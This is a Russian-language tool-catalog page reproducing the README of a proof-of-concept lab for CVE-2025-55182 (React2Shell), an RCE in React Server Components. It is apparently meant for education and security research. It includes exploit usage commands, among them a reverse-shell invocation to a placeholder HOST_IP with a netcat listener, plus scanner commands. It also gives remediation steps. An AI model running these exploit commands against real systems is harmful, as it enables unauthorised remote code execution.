Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2025-55182-poc — Лабораторная среда и PoC-эксплойт для CVE-2025-55182 (React2Shell), критической уязвимости RCE в React Server Components. Включает уязвимое приложение, скрипты эксплойта и сканер для исследований в области безопасности и обучения. | Kitploit
Инструменты/GitHubGitHub/mooowu/cve-2025-55182-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного ДоступаРазработка Полезной НагрузкиЛаборатории и Практика
GitHubmooowu/cve-2025-55182-poc

cve-2025-55182-poc

Лабораторная среда и PoC-эксплойт для CVE-2025-55182 (React2Shell), критической уязвимости RCE в React Server Components. Включает уязвимое приложение, скрипты эксплойта и сканер для исследований в области безопасности и обучения.

6 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

CVE-2025-55182 (React2Shell) Лаборатория анализа уязвимости

Этот репозиторий содержит полную среду для анализа и воспроизведения CVE-2025-55182 — критической уязвимости удаленного выполнения кода (RCE) в React Server Components (RSC), затрагивающей React 19.x и Next.js 15.x.

⚠️ ВНИМАНИЕ: Этот проект намеренно содержит уязвимый код. НЕ разворачивайте его на публичном сервере или в производственной среде.

🔍 Обзор уязвимости

  • CVE ID: CVE-2025-55182
  • Псевдоним: React2Shell
  • CVSS Score: 10.0 (CRITICAL)
  • Тип уязвимости: CWE-502 (Десериализация недоверенных данных)
  • Затронутые компоненты:
    • React Server Components (19.0.0 - 19.2.0)
    • Next.js (15.0.0 - 16.0.7)
    • react-server-dom-webpack, react-server-dom-turbopack

Механизм

Уязвимость существует в том, как среда выполнения React Server Components обрабатывает сериализованные данные из HTTP-запросов (Server Actions). Злоумышленник может создать вредоносную полезную нагрузку протокола "Flight", которая при десериализации на сервере выполняет произвольный код до проверки подлинности.

📂 Структура проекта

root@kitploit:~
react2shell/
├── vulnerable-app/       # Vulnerable Next.js 15 application
│   ├── app/
│   │   ├── actions.ts    # Vulnerable Server Actions
│   │   └── page.tsx      # UI for testing vulnerability
│   ├── Dockerfile        # Container definition
│   └── package.json
├── exploit/              # Exploit tools
│   ├── exploit.py        # Python PoC exploit
│   ├── scanner.py        # Vulnerability scanner
│   └── quick_exploit.sh  # Simple bash exploit
├── docs/                 # Analysis documentation
└── docker-compose.yml    # Isolated lab environment

🚀 Начало работы

Предварительные требования

  • Docker и Docker Compose
  • Python 3.x (для локального запуска эксплойтов)

1. Запуск лабораторного окружения

Запустите уязвимое приложение в изолированном контейнере:

root@kitploit:~
docker-compose up -d --build

Приложение будет доступно по адресу http://localhost:3000.

2. Проверка приложения

Откройте http://localhost:3000 в браузере. Вы должны увидеть интерфейс "React2Shell Lab" с несколькими тестовыми панелями:

  • Command Execution: Проверка прямой инъекции команд
  • Unsafe Deserialization: Проверка эксплойтов десериализации на основе JSON
  • Arbitrary File Read: Проверка обхода пути
  • System Info: Просмотр сведений о системе (для проверки влияния RCE)

⚔️ Эксплуатация

Мы предоставляем несколько инструментов для тестирования уязвимости.

Использование Python-эксплойта

  1. Установите зависимости:

    root@kitploit:~
    pip install -r exploit/requirements.txt
    
  2. Проверьте, уязвимо ли приложение:

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 --check
    
  3. Выполните команду:

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 -c "id"
    
  4. Обратная оболочка (Reverse Shell) (требуется слушатель, например, nc -lvnp 4444):

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 --revshell -l HOST_IP -p 4444
    

Использование сканера

Сканирование уязвимых экземпляров React/Next.js:

root@kitploit:~
python3 exploit/scanner.py -u http://localhost:3000

🛡️ Устранение уязвимости

Чтобы исправить эту уязвимость в ваших собственных приложениях:

  1. Обновите зависимости:

    • Обновите React до версии 19.3.0 или новее.
    • Обновите Next.js до версии 15.0.5, 15.1.9 или 16.0.8 в зависимости от вашей ветки.
  2. Проверьте исправление: Проверьте package.json, чтобы убедиться, что пакеты react-server-dom-* обновлены.

📝 Отказ от ответственности

Этот проект предназначен только для образовательных целей и исследований в области безопасности. Авторы не несут ответственности за неправомерное использование этого материала.

Скачать инструмент